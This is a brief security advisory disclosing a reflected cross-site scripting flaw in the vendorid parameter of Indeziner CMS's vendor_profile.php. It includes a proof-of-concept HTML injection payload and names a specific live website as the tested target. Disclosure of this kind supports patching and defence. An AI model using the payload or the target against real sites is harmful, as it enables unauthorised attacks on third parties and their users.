Indeziner CMS suffers from a cross site scripting vulnerability.
717c52498e9ce4c54be05a50b667515fa0a0f0fb8e8c1d545452c7a08217743b
# Cross Site Scripting on INDEZINER CMS
# Risk: Low
# CWE number: CWE-79
# Date: 19/04/2014
# Vendor: indeziner.com
# Author: Felipe Gabriel Renzi
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: vendor_profile.php
# Exploit: http://host/vendor_profile.php?vendorid=[xss]
# PoC:
- Target: http://excitefind.com
- Vuln. File: /vendor_profile.php?vendorid=
- Exploit: "><marquee>Vulnerable</marquee>